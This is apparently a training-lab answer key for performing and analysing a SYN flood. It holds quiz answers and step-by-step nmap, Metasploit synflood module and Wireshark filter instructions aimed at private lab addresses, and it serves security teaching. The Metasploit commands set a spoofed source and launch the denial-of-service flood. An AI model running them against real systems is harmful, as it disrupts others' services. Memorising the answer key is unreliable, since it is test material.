Lab 10.3.6 Perform and Analyze a SYN Flood Attack [WLOs: 1, 2, 3, 4, 5] [CLOs: 1, 2, 3]

Q1What is the source IP address of the SYN flood attack?

Your answer:

Correct answer: 192.168.0.33

Q2Which of the following MAC addresses is initiating the SYN flood attack?

Your answer:

Correct answer: 00:60:98:7F:41:E0 (IT-Laptop

 Explanation

In this lab, your task is to perform and monitor a SYN flood attack using the following information:

• Use Zenmap to find the FTP port on CorpServer (192.168.0.10).
• Use Metasploit to send a SYN flood attack as follows:
  • Remote host: 192.168.0.10
  • Source host: 192.168.0.33
  • Set the FTP port to match the FTP port used by CorpServer.
• Use Wireshark to capture the SYN flood on the enp2s0 network interface.
• Filter to show only TCP SYN packets.
• Find the MAC address of the computer causing the SYN flood.
• Answer the questions.

Complete this lab as follows:

1. From Zenmap, use nmap to find the FTP port used on CorpServer as follows:
   1. From the Favorites bar, open Zenmap.
   2. In the Command field, type nmap -p 0-100 192.168.0.10
   3. Select Scan.
      CorpServer is using port 21 for FTP.
   4. Close Zenmap.
2. Use Metasploit to send a SYN flood as follows:
   1. From the Favorites bar, open Metasploit Framework.
   2. At the prompt, type search synflood and press Enter to find a SYN flood Metasploit module.
   3. Type use auxiliary/dos/tcp/synflood and press Enter to select the SYN flood module.
   4. Type show options and press Enter to view the current options for the SYN flood module.
      Notice that RHOST and SHOST are unassigned and RPORT is set to port 80.
   5. Type set rhost 192.168.0.10 and press Enter to set the RHOST address.
   6. Type set shost 192.168.0.33 and press Enter to set the SHOST address.
   7. Type set rport 21 and press Enter to set the FTP port.
   8. Type show options and press Enter to view the new options for the SYN flood module.
      Notice that RHOST and SHOST have IP addresses assigned and RPORT is set to port 21 matching CorpServer.
3. Capture SYN flood attacks on the CorpServer machine as follows:
   1. From the Favorites bar, open Wireshark.
   2. Under Capture, select enp2s0.
   3. In the Apply a display filter field, type host 192.168.0.10 and tcp.flags.syn==1
   4. Press Enter.
   5. Select the blue fin to begin a Wireshark capture.
      Notice that no packets are being captured.
4. In Metasploit, type exploit and press Enter to start a SYN flood.
5. Capture packets for a few seconds.
6. In Wireshark, select the red box to stop the Wireshark capture.
   Notice the time between each packet sent to host 192.168.1.10. Notice that only SYN packets were captured.
7. In the top right, select Answer Questions.
8. Answer question 1.
9. In the middle pane, expand Ethernet II.
   Notice the source MAC address of the computer sending the SYN flood.
10. Answer question 2.
11. Select Score Lab.